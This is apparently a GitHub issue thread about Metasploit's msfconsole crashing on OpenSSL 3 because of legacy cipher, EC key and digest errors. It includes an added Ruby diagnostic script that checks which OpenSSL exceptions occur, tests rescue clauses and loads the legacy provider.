
So now what should I do, as I am preparing for an exam?

Instead of rescue OpenSSL::Cipher::CipherError => e use rescue OpenSSL::OpenSSLError => e.
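Added example, written in Ruby for this page and not code from Metasploit or hrr_rb_ssh: it puts adfoster-r7's explanation of the OpenSSL 3 legacy provider and bcoles' "rescue the base class" advice into one script you can run against your own Ruby/OpenSSL pair. It probes the three operations that fail in this thread (the bf-cbc cipher, in-place EC key generation, a legacy digest), reports which exception class each raises, shows which of the proposed rescue clauses would catch it, and includes the portable replacement for generate_key!. Two assumptions are marked in comments: that MD4 is the digest behind the SMB login failure (the thread does not name it), and that OpenSSL::Provider is only available on openssl gem versions newer than the ones discussed here.

```ruby
# Added example for this thread (not Metasploit or hrr_rb_ssh code): triage the
# OpenSSL 3 failures discussed above from a plain Ruby session, and check which
# rescue clause in reverse_ssh.rb would actually cover each of them.
require 'openssl'

# Exception classes that appeared in this issue, in the order they turned up:
# bf-cbc (original report), ecdsa generate_key! (Kali), SMB login digest
# (follow-up issue #16818).
OPENSSL_ERRORS = {
  'Cipher::CipherError' => OpenSSL::Cipher::CipherError,
  'PKey::PKeyError'     => OpenSSL::PKey::PKeyError,
  'Digest::DigestError' => OpenSSL::Digest::DigestError
}.freeze

# For a given `rescue <klass>` clause, which of the three would it catch?
# Every openssl-gem error inherits from OpenSSL::OpenSSLError, which is why the
# final workaround rescues the base class instead of one subclass at a time.
def caught_by(rescued_class)
  OPENSSL_ERRORS.transform_values { |klass| klass <= rescued_class ? true : false }
end

# Run one legacy operation; report :ok or the class of whatever it raised.
# The gem raises a plain RuntimeError (not an OpenSSLError) when OpenSSL was
# compiled without the algorithm at all, so report any StandardError by class.
def probe
  yield
  :ok
rescue StandardError => e
  e.class
end

# The two operations hrr_rb_ssh 0.4.2 performs at load time (cipher object in
# functionable.rb:13, in-place EC key generation in ecdsa_sha2_nistp256.rb:14)
# plus the digest NTLM authentication needs. Assumption: MD4 is the digest
# behind the SMB login failure; the thread does not name it.
def legacy_openssl_probe
  {
    openssl: OpenSSL::OPENSSL_LIBRARY_VERSION,
    bf_cbc: probe { OpenSSL::Cipher.new('bf-cbc') },
    ec_generate_key_bang: probe { OpenSSL::PKey::EC.new('prime256v1').generate_key! },
    md4: probe { OpenSSL::Digest.new('MD4') }
  }
end

# The OpenSSL-3-safe replacement for `EC.new(curve).generate_key!`: ask OpenSSL
# for a fresh key pair instead of mutating an empty pkey object. Works on
# OpenSSL 1.1 and 3 alike.
def generate_host_key(curve = 'prime256v1')
  OpenSSL::PKey::EC.generate(curve)
end

# When this issue was filed the openssl gem had no way to load providers
# (ruby/openssl#500). Assumption: later gem versions expose OpenSSL::Provider;
# when it is present, loading the legacy provider restores bf-cbc and MD4 for
# this process. Returns true only when the legacy provider was loaded.
def load_legacy_provider
  return false unless defined?(OpenSSL::Provider)
  # Explicitly loading any provider disables auto-loading of the default one,
  # so load both.
  OpenSSL::Provider.load('default')
  OpenSSL::Provider.load('legacy')
  true
rescue OpenSSL::OpenSSLError
  false
end

if __FILE__ == $PROGRAM_NAME
  before = legacy_openssl_probe
  puts "OpenSSL: #{before[:openssl]}"
  before.each { |k, v| puts "  #{k}: #{v}" unless k == :openssl }
  puts "rescue OpenSSL::Cipher::CipherError catches: #{caught_by(OpenSSL::Cipher::CipherError)}"
  puts "rescue OpenSSL::OpenSSLError catches:        #{caught_by(OpenSSL::OpenSSLError)}"
  if load_legacy_provider
    after = legacy_openssl_probe
    puts "after loading legacy provider: bf_cbc=#{after[:bf_cbc]} md4=#{after[:md4]}"
  end
  puts "host key curve: #{generate_host_key.group.curve_name}"
end
```

Run it with the same interpreter that runs msfconsole (for a git checkout, `bundle exec ruby probe.rb` inside the framework directory) so the probe sees the same OpenSSL build. On an OpenSSL 1.1 system all three probes should report :ok; on OpenSSL 3 without the legacy provider they should report the CipherError, PKeyError and DigestError classes quoted in this thread, and caught_by shows that only the base-class rescue covers all of them.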

Manangoel98 commented 2 years ago

Thanks, it's working fine, just getting warnings :)

munmun8 commented 2 years ago

Hi,

I applied the workaround on Kali; msfconsole is able to load successfully.

But I got this digest error when running some scans:

[Screenshot 2022-07-20 at 4 50 51 PM]

Sad-theFaceless commented 2 years ago

The error is solved. Update your package metasploit-framework and it should work again without workaround.

adfoster-r7 commented 2 years ago

@munmun8 Unfortunately it looks like some of the SMB modules, and a few other modules will be broken with OpenSSL 3. I'm investigating that more currently. The easiest solution at this point may be to downgrade the Kali OpenSSL version to 1.1.1

ksaadDE commented 2 years ago

@adfoster-r7

but got this digest error when running some scan

@munmun8 Unfortunately it looks like some of the SMB modules, and a few other modules will be broken with OpenSSL 3. I'm investigating that more currently. The easiest solution at this point may be to downgrade the Kali OpenSSL version to 1.1.1

I would say: please open a new issue and reference this one in its context.

adfoster-r7 commented 2 years ago

Closing this issue now that msfconsole no longer crashes on bootup in later versions.

Is your Kali crashing?

If your msfconsole is crashing on bootup due to OpenSSL3 - follow this fix: https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

Are some modules no longer working?

Some modules now fail with cryptic errors such as SMB Login which gives the error OpenSSL::Digest::DigestError Digest initialization failed: initialization error. We're now tracking that work on a separate issue over here: https://github.com/rapid7/metasploit-framework/issues/16818

Feel free to vote on that issue or leave a comment on which module is now failing so we can verify it will be fixed